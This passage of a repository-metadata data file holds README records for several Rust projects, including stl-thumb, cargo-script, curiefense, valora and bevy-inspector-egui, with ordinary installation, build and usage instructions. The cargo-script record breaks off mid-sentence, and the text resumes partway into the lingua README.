It is written in Rust and uses OpenGL.\n\n![Screenshot](https://user-images.githubusercontent.com/3131268/116009182-f3f89c80-a5cc-11eb-817d-91e8a9fad279.png)\n\n## Installation\n\n### Windows\n\nStl-thumb requires 64-bit Windows 7 or later. [Download the installer .exe](https://github.com/unlimitedbacon/stl-thumb/releases/latest) for the latest release and run it.\n\nThe installer will tell the Windows shell to refresh the thumbnail cache; however, this does not always seem to work. If your icons do not change then try using the [Disk Cleanup](https://en.wikipedia.org/wiki/Disk_Cleanup) utility to clear the thumbnail cache.\n\n### Linux\n\nStl-thumb works with Gnome and most other similar desktop environments. If you are using the KDE desktop environment then you will also need to install the separate [`stl-thumb-kde`](https://github.com/unlimitedbacon/stl-thumb-kde) package.\n\nMake sure that your file manager is set to generate previews for files larger than 1 MB. Most file managers have this setting under the Preview tab in their Preferences.\n\n#### Arch\n\nA package is available [in the AUR](https://aur.archlinux.org/packages/stl-thumb/). Install it manually or using your favorite AUR helper.\n\n```\n$ yay -S stl-thumb\n```\n\n#### Debian / Ubuntu\n\n[Download the .deb package](https://github.com/unlimitedbacon/stl-thumb/releases/latest) for your platform (usually amd64) and install it. Packages are also available for armhf (Raspberry Pi) and arm64 (Pine64 and other SBCs).\n\n```\n$ sudo apt install ./stl-thumb_0.4.0_amd64.deb\n```\n\n#### openSUSE\n\nFor openSUSE Tumbleweed there is a user repo available:\n\n```\n$ sudo zypper ar -f obs://home:jubalh:stl stl\n$ sudo zypper ref\n$ sudo zypper install stl-thumb\n```\n\n## Building\n\n### Building the tool itself:\nYou can build the debug version with:\n```\n$ cargo build\n```\nWhen you're done, build the release version with:\n```\n$ cargo build --release\n```\n### Building the .deb-package:\n```\n$ cargo install cargo-deb # this is an additional dependency\n$ cargo deb\n```\n### Building the .rpm-package:\n```\n$ cargo install cargo-rpm # this is an additional dependency\n$ cargo rpm build\n```\n\n## Command Line Usage\n\n```\n$ stl-thumb <STL_FILE> [IMG_FILE]\n```\n\n### Options\n\n| Option | Description |\n| ------------- | ------------------------------------------------------- |\n| \\<STL_FILE\\> | The STL file you want a picture of. Use - to read from stdin instead of a file. |\n| \\<IMG_FILE\\> | The thumbnail image file that will be created. Use - to write to stdout instead of a file. |\n| -s, --size \\<size\\> | Specify width of the image. It will always be a square. |\n| -f, --format \\<format\\> | The format of the image file. If not specified it will be determined from the file extension, or default to PNG if there is no extension. Supported formats: PNG, JPEG, GIF, ICO, BMP |\n| -m, --material \\<ambient\\> \\<diffuse\\> \\<specular\\> | Colors for rendering the mesh using the Phong reflection model. Requires 3 colors as rgb hex values: ambient, diffuse, and specular. Defaults to blue. |\n| -b, --background \\<color\\> | The background color with transparency (rgba). Default is ffffff00. |\n| -a, --antialiasing [none, fxaa] | Anti-aliasing method. Default is FXAA, which is fast but may introduce artifacts. |\n| --recalc-normals | Force recalculation of face normals. Use when dealing with malformed STL files. |\n| -x | Display the image in a window instead of saving a file. |\n| -h, --help | Prints help information. |\n| -V, --version | Prints version information. |\n| -v[v][v] | Increase message verbosity. 
Levels: Errors, Warnings, Info, Debugging |\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "DanielKeep/cargo-script", "link": "https://github.com/DanielKeep/cargo-script", "tags": [], "stars": 648, "description": "Cargo script subcommand", "lang": "Rust", "repo_lang": "", "readme": "# `cargo-script`\n\n`cargo-script` is a Cargo subcommand designed to let people quickly and easily run Rust \"scripts\" which can make use of Cargo's package ecosystem. It can also evaluate expressions and run filters.\n\nSome of `cargo-script`'s features include:\n\n- Reading Cargo manifests embedded in Rust scripts.\n- Caching compiled artefacts (including dependencies) to amortise build times.\n- Supporting executable Rust scripts via UNIX hashbangs and Windows file associations.\n- Evaluating expressions on the command-line.\n- Using expressions as stream filters (*i.e.* for use in command pipelines).\n- Running unit tests and benchmarks from scripts.\n- Custom templates for command-line expressions and filters.\n\n**Note**: `cargo-script` *does not* work when Cargo is instructed to use a target architecture different from the default host architecture.\n\nTable of contents:\n\n- [Installation](#installation)\n - [Migrating From Previous Versions](#migrating)\n - [Features](#features)\n - [Manually Compiling and Installing](#compiling)\n - [Self-Executing Scripts](#hashbang)\n- [Usage](#usage)\n - [Scripts](#scripts)\n - [Expressions](#expressions)\n - [Stream Filters](#filters)\n - [Environment Variables](#env-vars)\n - [Templates](#templates)\n- [Known Issues](#issues)\n- [License](#license)\n - [Contribution](#contribution)\n\n\n## Installation\n\nThe recommended method for installing `cargo-script` is by using Cargo's `install` subcommand:\n\n```sh\ncargo install cargo-script\n```\n\nIf you have already installed `cargo-script`, you can update to the latest version by using:\n\n```sh\ncargo install --force cargo-script\n```\n\n\n### Migrating From Previous Versions\n\n`cargo-script` supports migrating data from previous versions. This is not mandatory, but may be preferred. Using `cargo script --migrate-data dry-run` will perform a \"dry run\", informing you of any applicable migrations. Using the `for-real` option will actually perform the migration. The following migrations may be applicable:\n\n- 0.1 \u2192 0.2: On non-Windows platforms, and when `CARGO_HOME` is defined, moves the location for cached data from `$CARGO_HOME/.cargo` to `$CARGO_HOME`.\n\n\n### Cargo Features\n\nThe following features are defined:\n\n- `suppress-cargo-output` (default): if building the script takes less than 2 seconds and succeeds, `cargo-script` will suppress Cargo's output. Note that this disables coloured Cargo output on Windows.\n\n\n### Manually Compiling and Installing\n\n`cargo-script` requires Rust 1.11 or higher to build. Rust 1.4+ was supported prior to version 0.2.\n\nOnce built, you should place the resulting executable somewhere on your `PATH`. At that point, you should be able to invoke it by using `cargo script`. Note that you *can* run the executable directly, but the first argument will *need* to be `script`.\n\nIf you want to run `cargo script` from a hashbang on UNIX, or via file associations on Windows, you should also install the `run-cargo-script` program somewhere on `PATH`.\n\n\n### Self-Executing Scripts\n\nOn UNIX systems, you can use `#!/usr/bin/env run-cargo-script` as a hashbang line in a Rust script. 
If the script file is executable, this will allow you to execute the script file directly.\n\nIf you are using Windows, you can associate the `.crs` extension (which is simply a renamed `.rs` file) with `run-cargo-script`. This allows you to execute Rust scripts simply by naming them like any other executable or script.\n\nThis can be done using the `cargo-script file-association` command (note the hyphen in `cargo-script`). This command can also remove the file association. If you pass `--amend-pathext` to the `file-association install` command, it will also allow you to execute `.crs` scripts *without* having to specify the file extension, in the same way that `.exe` and `.bat` files can be used.\n\nIf you want to make a script usable across platforms, it is recommended that you use *both* a hashbang line *and* give the file a `.crs` file extension.\n\n## Usage\n\nGenerally, you will want to use `cargo-script` by invoking it as `cargo script` (note the lack of a hyphen). Doing so is equivalent to invoking it as `cargo-script script`. `cargo-script` supports several other subcommands, which can be accessed by running `cargo-script` directly. You can also get an overview of the available options using the `--help` flag.\n\n\n### Scripts\n\nThe primary use for `cargo-script` is for running Rust source files as scripts. For example:\n\n```shell\n$ echo 'fn main() { println!(\"Hello, World!\"); }' > hello.rs\n$ cargo script hello.rs\nHello, World!\n$ cargo script hello # you can leave off the file extension\nHello, World!\n```\n\nThe output of Cargo will be hidden unless compilation fails, or takes longer than a few seconds.\n\n`cargo-script` will also look for embedded dependency and manifest information in the script. For example, all of the following are equivalent:\n\n- `now.crs` (code block manifest with UNIX hashbang and `.crs` extension):\n\n ```rust\n #!/usr/bin/env run-cargo-script\n //! This is a regular crate doc comment, but it also contains a partial\n //! Cargo manifest. Note the use of a *fenced* code block, and the\n //! `cargo` \"language\".\n //!\n //! ```cargo\n //! [dependencies]\n //! time = \"0.1.25\"\n //! ```\n extern crate time;\n fn main() {\n println!(\"{}\", time::now().rfc822z());\n }\n ```\n\n- `now.rs` (dependency-only, short-hand manifest):\n\n ```rust\n // cargo-deps: time=\"0.1.25\"\n // You can also leave off the version number, in which case, it's assumed\n // to be \"*\". Also, the `cargo-deps` comment *must* be a single-line\n // comment, and it *must* be the first thing in the file, after the\n // hashbang.\n extern crate time;\n fn main() {\n println!(\"{}\", time::now().rfc822z());\n }\n ```\n\n > **Note**: you can write multiple dependencies by separating them with commas. *E.g.* `time=\"0.1.25\", libc=\"0.2.5\"`.\n\nOn running either of these, `cargo-script` will generate a Cargo package, build it, and run the result. 
The output may look something like:\n\n```shell\n$ cargo script now\n Updating registry `https://github.com/rust-lang/crates.io-index`\n Compiling winapi-build v0.1.1\n Compiling winapi v0.2.8\n Compiling libc v0.2.30\n Compiling kernel32-sys v0.2.2\n Compiling time v0.1.38\n Compiling now v0.1.0 (file:///C:/Users/drk/AppData/Local/Cargo/script-cache/file-now-37cb982cd51cc8b1)\n Finished release [optimized] target(s) in 49.7 secs\nSun, 17 Sep 2017 20:38:58 +1000\n```\n\nSubsequent runs, provided the script has not changed, will likely just run the cached executable directly:\n\n```shell\n$ cargo script now\nSun, 17 Sep 2017 20:39:40 +1000\n```\n\nUseful command-line arguments:\n\n- `--bench`: Compile and run benchmarks. Requires a nightly toolchain.\n- `--debug`: Build a debug executable, not an optimised one.\n- `--features <features>`: Cargo features to pass when building and running.\n- `--force`: Force the script to be rebuilt. Useful if you want to force a recompile with a different toolchain.\n- `--gen-pkg-only`: Generate the Cargo package, but don't compile or run it. Effectively \"unpacks\" the script into a Cargo package.\n- `--test`: Compile and run tests.\n\n\n### Expressions\n\n`cargo-script` can also run pieces of Rust code directly from the command line. This is done by providing the `--expr` option; this causes `cargo-script` to interpret the `\n```\n\nThere are also some integration tests available both for Node.js and for the browsers Chrome and Firefox.\nTo run them, simply say:\n\n wasm-pack test --node --headless --chrome --firefox\n\nThe output of `wasm-pack` will be hosted in a [separate repository](https://github.com/pemistahl/lingua-js) which\nallows adding further JavaScript-related configuration, tests and documentation. *Lingua* will then be added to the \n[npm registry](https://www.npmjs.com) as well, allowing for an easy download and installation within every JavaScript \nor TypeScript project.\n\n## 11. What's next for version 1.5.0?\n\nTake a look at the [planned issues](https://github.com/pemistahl/lingua-rs/milestone/7).\n\n## 12. Contributions\n\n- [Josh Rotenberg](https://github.com/joshrotenberg) has written a [wrapper](https://github.com/joshrotenberg/lingua_ex)\nfor using *Lingua* with the [Elixir programming language](https://elixir-lang.org/).\n \n- [Simon Liang](https://github.com/lhr0909) has written a [wrapper](https://github.com/xanthous-tech/lingua-node)\nfor using *Lingua* with [NodeJS](https://nodejs.org/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "curiefense/curiefense", "link": "https://github.com/curiefense/curiefense", "tags": ["envoyproxy", "waf", "botmanagement", "ddos", "cloud-native", "microservices", "security", "rate-limiter", "ddos-protection", "session", "bot-management", "cncf"], "stars": 591, "description": "Curiefense is a unified, open source platform protecting cloud native applications.", "lang": "Rust", "repo_lang": "", "readme": "
\n\t\"Curiefense\n\t

\n
\n\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4576/badge)](https://bestpractices.coreinfrastructure.org/projects/4576) \n[![CodeQL](https://github.com/curiefense/curiefense/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/curiefense/curiefense/actions/workflows/codeql-analysis.yml)\n[![GitHub](https://img.shields.io/github/license/curiefense/curiefense)](https://github.com/curiefense/curiefense/blob/master/LICENSE)\n[![CNCF](https://shields.io/badge/CNCF-Sandbox%20project-blue?logo=linux-foundation&style=flat)](https://landscape.cncf.io/card-mode?project=sandbox&selected=curiefense)\n[![Slack](https://shields.io/badge/Slack-Join%20Us-yellow?logo=slack&style=flat)](https://join.slack.com/t/curiefense/shared_invite/zt-nc8lyrjo-JJoY2mwrqNOfkmoA6ycTHg)\n[![Twitter](https://img.shields.io/badge/Follow-@curiefense-blue.svg?style=flat&logo=twitter)](https://twitter.com/intent/follow?screen_name=curiefense)\n\n\n---\n\nCuriefense is a new application security platform, which protects sites, services, and APIs. It extends Envoy proxy to defend against a variety of threats, including SQL and command injection, cross site scripting (XSS), account takeovers (ATOs), application-layer DDoS, remote file inclusion (RFI), API abuse, and more.\n\n## Getting Started\n\n## Documentation\n\n* [Curiefense Documentation](https://docs.curiefense.io)\n* [Quick Start Guide](https://docs.curiefense.io/installation/getting-started-with-curiefense)\n* [FAQ](https://www.curiefense.io/faq)\n\n### Docker\n```bash\ngit clone https://github.com/curiefense/curiefense.git\ncd curiefense/deploy/compose/\ndocker-compose up\n```\n\n### Video Overview\n
\n\n## Community\n\nThere are many ways to get involved with Curiefense. \n\n* [Twitter](https://twitter.com/curiefense)\n* [CNCF Community Group](https://community.cncf.io/curiefense/)\n* [Slack](https://join.slack.com/t/curiefense/shared_invite/zt-nc8lyrjo-JJoY2mwrqNOfkmoA6ycTHg)\n\n
\n\n---\n\n
\n\nThis project is named after the famous scientist [Marie Salomea Sk\u0142odowska Curie](https://www.curiefense.io/marie-curie). It began in intensive work sessions at Malakoff, France, close to her home and laboratory in the outskirts of Paris, and is being released on her birthday (November 7th).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "turnage/valora", "link": "https://github.com/turnage/valora", "tags": [], "stars": 590, "description": "painting by functions", "lang": "Rust", "repo_lang": "", "readme": "# valora\n\n[![](https://docs.rs/valora/badge.svg)](https://docs.rs/valora) [![crates.io](https://img.shields.io/crates/v/valora.svg)](https://crates.io/crates/valora) ![Rust](https://github.com/turnage/valora/workflows/Rust/badge.svg?branch=master)\n\nA brush for generative fine art. [Read the guide!](https://paytonturnage.gitbook.io/valora/)\n\nThis is a graphics library and CLI focused on generative fine art for print.\n\nFeatures\n\n* Repeatable works at arbitrary resolutions without changing the work\n* Managed rngs for repeatable works and controlled rng trees\n* Support for using a different, custom GLSL shader for each vector path\n* GLSL live coding with \"#include\" support\n* An ergonomic derive-based GLSL uniforms interface\n* Animation support for brainstorming and cumulative pieces\n\n![](https://i.imgur.com/e2rsMVb.png)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jakobhellermann/bevy-inspector-egui", "link": "https://github.com/jakobhellermann/bevy-inspector-egui", "tags": [], "stars": 590, "description": "Inspector plugin for the bevy game engine", "lang": "Rust", "repo_lang": "", "readme": "# bevy-inspector-egui\n\nExamples can be found at [`./crates/bevy-inspector-egui/examples`](./crates/bevy-inspector-egui/examples/).\n\nMigration guide for 0.16 is at [`docs/MIGRATION_GUIDE_0.15_0.16.md`](./docs/MIGRATION_GUIDE_0.15_0.16.md)\n\nThis crate contains\n- general purpose machinery for displaying [`Reflect`](bevy_reflect::Reflect) values in [reflect_inspector],\n- a way of associating arbitrary options with fields and enum variants in [inspector_options]\n- utility functions for displaying bevy resources, entities and assets in [bevy_inspector]\n- some drop-in plugins in [quick] to get you started without any code necessary.\n\nThe changelog can be found at [`docs/CHANGELOG.md`](./docs/CHANGELOG.md).\n\n# Use case 1: Quick plugins\nThese plugins can be easily added to your app, but don't allow for customization of the presentation and content.\n\n## WorldInspectorPlugin\nDisplays the world's entities, resources and assets.\n\n![image of the world inspector](https://raw.githubusercontent.com/jakobhellermann/bevy-inspector-egui/main/docs/images/world_inspector.png)\n\n```rust\nuse bevy::prelude::*;\nuse bevy_inspector_egui::quick::WorldInspectorPlugin;\n\nfn main() {\n App::new()\n .add_plugins(DefaultPlugins)\n .add_plugin(WorldInspectorPlugin)\n .run();\n}\n```\n## ResourceInspectorPlugin\nDisplay a single resource in a window.\n\n![image of the resource inspector](https://raw.githubusercontent.com/jakobhellermann/bevy-inspector-egui/main/docs/images/resource_inspector.png)\n\n```rust\nuse bevy::prelude::*;\nuse bevy_inspector_egui::prelude::*;\nuse bevy_inspector_egui::quick::ResourceInspectorPlugin;\n\n// `InspectorOptions` are completely optional\n#[derive(Reflect, Resource, Default, 
InspectorOptions)]\n#[reflect(Resource, InspectorOptions)]\nstruct Configuration {\n name: String,\n #[inspector(min = 0.0, max = 1.0)]\n option: f32,\n}\n\nfn main() {\n App::new()\n .add_plugins(DefaultPlugins)\n .init_resource::<Configuration>() // `ResourceInspectorPlugin` won't initialize the resource\n .register_type::<Configuration>() // you need to register your type to display it\n .add_plugin(ResourceInspectorPlugin::<Configuration>::default())\n // also works with built-in resources, as long as they are `Reflect`\n .add_plugin(ResourceInspectorPlugin::